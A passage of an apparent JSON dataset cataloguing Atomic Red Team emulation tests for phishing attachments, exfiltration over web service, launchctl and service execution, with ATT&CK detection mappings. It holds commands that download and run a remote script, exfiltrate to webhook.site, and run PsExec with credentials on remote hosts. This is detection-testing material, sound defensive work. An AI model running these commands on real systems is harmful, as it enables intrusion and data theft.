\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"Word\"\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1566.001", + "display_name": "Phishing: Spearphishing Attachment", + "atomic_tests": [ + { + "name": "Download Macro-Enabled Phishing Attachment", + "auto_generated_guid": "114ccff9-ae6d-4547-9ead-4cd69f687306", + "description": "This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.\nThe file \"PhishingAttachment.xlsm\" is downloaded to the %temp% directory.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n", + "name": "powershell", + "cleanup_command": "Remove-Item $env:TEMP\\PhishingAttachment.xlsm -ErrorAction Ignore\n" + } + }, + { + "name": "Word spawned a command shell and used an IP address in the command line", + "auto_generated_guid": "cbb6799a-425c-4f83-9194-5447a909d67f", + "description": "Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity.\nUpon execution, CMD will be lauchned and ping 8.8.8.8\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "jse_path": { + "description": "Path for the macro to write out the \"malicious\" .jse file\n", + "type": "String", + "default": "C:\\Users\\Public\\art.jse" + }, + "ms_product": { + "description": "Maldoc application Word or Excel", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "cleanup_command": "Remove-Item #{jse_path} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1567", + "command_list": [ + "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n" + ], + "commands": [ + { + "command": "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n", + "source": "atomics/T1567/T1567.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Web Service" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1567", + "display_name": "Exfiltration Over Web Service", + "atomic_tests": [ + { + "name": "Data Exfiltration with ConfigSecurityPolicy", + "auto_generated_guid": "5568a8f4-a8b1-4c40-9399-4969b642f122", + "description": "Exfiltration of data using ConfigSecurityPolicy.exe\nhttps://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-4d9c6e43dacf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$path = resolve-path \"c:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\ConfigSecurityPolicy.exe\"\n& $path[0] c:\\temp\\config.xml \"https://webhook.site?d=sensitive-data-here\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1569.001", + "command_list": [ + "launchctl submit -l #{label_name} -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n", + "launchctl submit -l evil -- #{executable_path}\n" + ], + "commands": [ + { + "command": "launchctl submit -l #{label_name} -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n", + "source": "atomics/T1569.001/T1569.001.yaml", + "name": "Atomic Red Team Test - System Services: Launchctl" + }, + { + "command": "launchctl submit -l evil -- #{executable_path}\n", + "source": "atomics/T1569.001/T1569.001.yaml", + "name": "Atomic Red Team Test - System Services: Launchctl" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1569.001", + "display_name": "System Services: Launchctl", + "atomic_tests": [ + { + "name": "Launchctl", + "auto_generated_guid": "6fb61988-724e-4755-a595-07743749d4e2", + "description": "Utilize launchctl\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "executable_path": { + "description": "Path of the executable to run.", + "type": "Path", + "default": "/System/Applications/Calculator.app/Contents/MacOS/Calculator" + }, + "label_name": { + "description": "Path of the executable to run.", + "type": "String", + "default": "evil" + } + }, + "executor": { + "command": "launchctl submit -l #{label_name} -- #{executable_path}\n", + "cleanup_command": "launchctl remove #{label_name}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1569.002", + "command_list": [ + "sc.exe create ARTService binPath= \"#{executable_command}\"\nsc.exe start ARTService\nsc.exe delete ARTService\n", + "sc.exe create #{service_name} binPath= \"%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "#{psexec_exe} \\\\localhost -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "#{psexec_exe} \\\\#{remote_host} -u DOMAIN\\Administrator -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p P@ssw0rd1 -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "C:\\PSTools\\PsExec.exe \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "psexec.py '#{domain}/#{username}:#{password}@127.0.0.1' '#{command}'\n", + "psexec.py '#{domain}/Administrator:#{password}@#{remote_host}' '#{command}'\n", + "psexec.py '/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "psexec.py '#{domain}/#{username}:P@ssw0rd1@#{remote_host}' '#{command}'\n", + "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' 'whoami'\n", + "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n" + ], + "commands": [ + { + "command": "sc.exe create ARTService binPath= \"#{executable_command}\"\nsc.exe start ARTService\nsc.exe delete ARTService\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "sc.exe create #{service_name} binPath= \"%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\localhost -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\#{remote_host} -u DOMAIN\\Administrator -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p P@ssw0rd1 -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "C:\\PSTools\\PsExec.exe \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:#{password}@127.0.0.1' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/Administrator:#{password}@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:P@ssw0rd1@#{remote_host}' '#{command}'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' 'whoami'\n", + "source": "atomics/T1569.002/T1569.002.yaml", + "name": "Atomic Red Team Test - System Services: Service Execution" + }, + { + "command": "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start 